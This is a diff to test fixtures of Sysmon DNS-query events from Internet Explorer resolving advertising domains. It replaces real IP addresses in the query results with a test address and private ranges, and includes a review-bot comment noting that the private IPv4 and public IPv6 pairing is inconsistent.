@@ -5451,7 +5451,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693021600Z'/\u003e\u003cEventRecordID\u003e154\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.507\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ejadserve.postrelease.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 jadserve.postrelease.com.akadns.net;::ffff:54.80.117.178;::ffff:3.217.22.176;::ffff:35.153.215.15;::ffff:52.207.54.164;::ffff:52.204.186.237;::ffff:52.86.46.105;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693021600Z'/\u003e\u003cEventRecordID\u003e154\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.507\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ejadserve.postrelease.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 jadserve.postrelease.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -5463,7 +5463,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693033600Z'/\u003e\u003cEventRecordID\u003e155\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.508\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eappnexus-partners.tremorhub.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:107.21.43.184;::ffff:54.164.220.86;::ffff:52.72.172.174;::ffff:3.209.65.250;::ffff:3.94.51.187;::ffff:34.193.211.130;::ffff:18.214.47.10;::ffff:18.214.151.246;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693033600Z'/\u003e\u003cEventRecordID\u003e155\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.508\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eappnexus-partners.tremorhub.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -5475,7 +5475,7 @@
 "ProcessId": "2736",
 "QueryName": "appnexus-partners.tremorhub.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:107.21.43.184;::ffff:54.164.220.86;::ffff:52.72.172.174;::ffff:3.209.65.250;::ffff:3.94.51.187;::ffff:34.193.211.130;::ffff:18.214.47.10;::ffff:18.214.151.246;192.5.6.30;2001:503:a83e::2:30;",
+ "QueryResults": "type: 5 partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe"
 },
 "event_id": "22",
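Review bot: Rewriting `192.5.6.30` as `192.168.6.30` turns what looks like a public gTLD nameserver glue address into an RFC 1918 private address, while its paired IPv6 entry `2001:503:a83e::2:30` is left as-is, so the new answer set mixes a private v4 with a public v6 for the same nameserver and could not occur in a real resolution. Any per-address enrichment on the expected side (geo/ASN lookups, private-vs-public classification) would now flip for the v4 entry only, which is a coverage change rather than a neutral substitution; I cannot see those derived fields in this hunk, so please confirm they were regenerated. If the goal is simply to avoid real public IPs, either apply the same treatment to the v6 entries or take the v4 glue addresses from the allowed test address used elsewhere in this line. The enclosing `event_data` object starts outside the hunk.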
@@ -5505,7 +5505,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693044900Z'/\u003e\u003cEventRecordID\u003e156\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.531\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.dlx.addthis.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:107.21.14.70;::ffff:107.23.33.163;::ffff:23.22.192.59;::ffff:100.24.96.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693044900Z'/\u003e\u003cEventRecordID\u003e156\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.531\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.dlx.addthis.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" 
@@ -5524,7 +5524,7 @@
 "event_data": {
 "QueryName": "x.dlx.addthis.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:107.21.14.70;::ffff:107.23.33.163;::ffff:23.22.192.59;::ffff:100.24.96.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;",
+ "QueryResults": "type: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:04.531",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -5547,7 +5547,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693057200Z'/\u003e\u003cEventRecordID\u003e157\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.532\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edh.serving-sys.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 haproxy-dmp.sizmdx.com;type: 5 dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:18.205.112.71;::ffff:50.19.40.146;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693057200Z'/\u003e\u003cEventRecordID\u003e157\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.532\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edh.serving-sys.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 haproxy-dmp.sizmdx.com;type: 5 dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -5564,7 +5564,7 @@
 "ProcessId": "2736",
 "QueryName": "dh.serving-sys.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 haproxy-dmp.sizmdx.com;type: 5 dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:18.205.112.71;::ffff:50.19.40.146;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;",
+ "QueryResults": "type: 5 haproxy-dmp.sizmdx.com;type: 5 dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:04.532",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}"
@@ -5586,7 +5586,7 @@ { "@timestamp": "2021-05-05T15:30:51.707Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693070300Z'/\u003e\u003cEventRecordID\u003e158\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.534\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sharethrough.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-us-east-1.sharethrough.com;::ffff:52.55.160.246;::ffff:3.211.67.240;::ffff:35.173.61.59;::ffff:34.233.179.235;::ffff:34.228.105.237;::ffff:52.7.23.213;::ffff:52.201.177.113;::ffff:34.235.70.251;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693070300Z'/\u003e\u003cEventRecordID\u003e158\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.534\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sharethrough.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-us-east-1.sharethrough.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -5598,7 +5598,7 @@
 "identifier": "S-1-5-18"
 },
 "event_data": {
- "QueryResults": "type: 5 match-us-east-1.sharethrough.com;::ffff:52.55.160.246;::ffff:3.211.67.240;::ffff:35.173.61.59;::ffff:34.233.179.235;::ffff:34.228.105.237;::ffff:52.7.23.213;::ffff:52.201.177.113;::ffff:34.235.70.251;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;",
+ "QueryResults": "type: 5 match-us-east-1.sharethrough.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:04.534",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -5650,7 +5650,7 @@
 "event_data": {
 "QueryName": "tags.rd.linksynergy.com",
 "QueryStatus": "0",
- "QueryResults": "::ffff:35.241.16.233;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;",
+ "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:04.601",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -5661,7 +5661,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836591400Z'/\u003e\u003cEventRecordID\u003e159\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.601\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.rd.linksynergy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.241.16.233;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836591400Z'/\u003e\u003cEventRecordID\u003e159\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.601\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.rd.linksynergy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" 
